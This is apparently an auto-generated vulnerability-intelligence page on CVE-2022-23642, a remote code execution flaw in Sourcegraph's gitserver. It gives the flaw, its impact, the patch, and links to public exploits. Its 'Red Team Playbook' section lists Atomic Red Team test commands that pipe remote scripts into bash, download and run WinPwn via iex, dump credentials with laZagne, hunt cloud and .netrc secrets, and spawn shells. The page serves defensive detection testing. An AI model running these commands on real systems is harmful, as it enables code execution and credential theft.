CVE-2022-23642
Overview
This vulnerability is a remote code execution flaw caused by improper restriction on the invocation of the git config command within the gitserver service of Sourcegraph. The root cause lies in the gitserver acting as a git exec proxy that fails to validate or restrict modifications to the git core.sshCommand configuration option. This misconfiguration allows unauthorized manipulation of git's SSH command execution behavior.
Vulnerability Description
Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.
Impact
An attacker with the ability to send HTTP requests to internal Sourcegraph services like gitserver can execute arbitrary commands remotely by manipulating git's SSH command execution. This requires at least low-level privileges (PR:L) and network access to the affected internal service, with no user interaction needed. Successful exploitation can lead to complete compromise of the affected system, including unauthorized code execution and potential lateral movement within the network, as indicated by the CVSS vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.
Solution
Upgrade Sourcegraph to version 3.37 or later, where this vulnerability is patched as detailed in the GitHub security advisory GHSA-qcmp-fx72-q8q9 (https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9). As an interim mitigation, restrict and properly protect HTTP access to the gitserver service to prevent unauthorized requests, as recommended by the vendor in their advisory and patch notes.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Sourcegraph, a widely used code search and navigation engine, stems from improper restrictions in the `gitserver` service, which acts as a proxy for Git operations. Specifically, the service fails to adequately limit the execution of the `git config` command, allowing an attacker to manipulate the `core.sshCommand` option. This option enables the specification of a custom command for SSH connections, which can be exploited to redirect Git operations to malicious servers or execute arbitrary commands on the host system. The flaw is particularly concerning because it permits remote code execution, significantly increasing the attack surface for potential intruders.
Exploitation of this vulnerability is contingent upon an attacker’s ability to make HTTP requests to the internal `gitserver` service. In scenarios where Sourcegraph is deployed without stringent access controls, an attacker could leverage this flaw to execute arbitrary code. For instance, if an attacker gains access to a developer's environment or a CI/CD pipeline that interacts with the `gitserver`, they could craft a malicious request that modifies the SSH command. This could lead to unauthorized access to sensitive repositories or even the execution of harmful scripts on the server, thereby compromising the integrity and confidentiality of the codebase.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Sourcegraph for managing their code repositories. The potential for remote code execution poses a severe business risk, as it could lead to data breaches, loss of intellectual property, and disruption of services. Furthermore, the exploitation of this vulnerability could facilitate lateral movement within an organization's network, allowing attackers to escalate privileges and access other critical systems. The financial implications of such breaches can be substantial, encompassing remediation costs, legal liabilities, and damage to reputation.
To detect and mitigate this vulnerability, organizations should prioritize the implementation of robust access controls around the `gitserver` service. This includes ensuring that only authorized users and services can communicate with `gitserver`, thereby minimizing the risk of unauthorized exploitation. Regular audits of network configurations and access logs can help identify any suspicious activity or potential breaches. Additionally, organizations should upgrade to the patched version of Sourcegraph (version 3.37 or later) to eliminate the vulnerability entirely. Employing intrusion detection systems (IDS) and monitoring tools can also aid in the early detection of anomalous behavior associated with exploitation attempts.
In conclusion, the vulnerability present in Sourcegraph’s `gitserver` service highlights the critical importance of secure coding practices and robust access controls in software development environments. As organizations increasingly rely on tools like Sourcegraph for code management, understanding and addressing such vulnerabilities is essential to safeguarding their digital assets. By implementing proactive security measures and staying informed about potential threats, organizations can significantly reduce their risk exposure and enhance their overall cybersecurity posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sourcegraph | Sourcegraph | All |
cpe:2.3:a:sourcegraph:sourcegraph:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Sourcegraph gitserver sshCommand RCE
exploits/linux/http/sourcegraph_gitserver_sshcmd
|
Altelus1, Spencer McIntyre | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) | Altelus | remote | multiple | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Altelus1/CVE-2022-23642
PoC for Sourcegraph Gitserver < 3.37.0 RCE (CVE-2022-23642)
|
Altelus1 | 7 | 3 | 2022-06-10 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-23642 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sourcegraph/sourcegraph/pull/30833 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167506/Sourcegraph-Gitserver-3.36.3-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167741/Sourcegraph-gitserver-sshCommand-Remote-Command-Execution.html |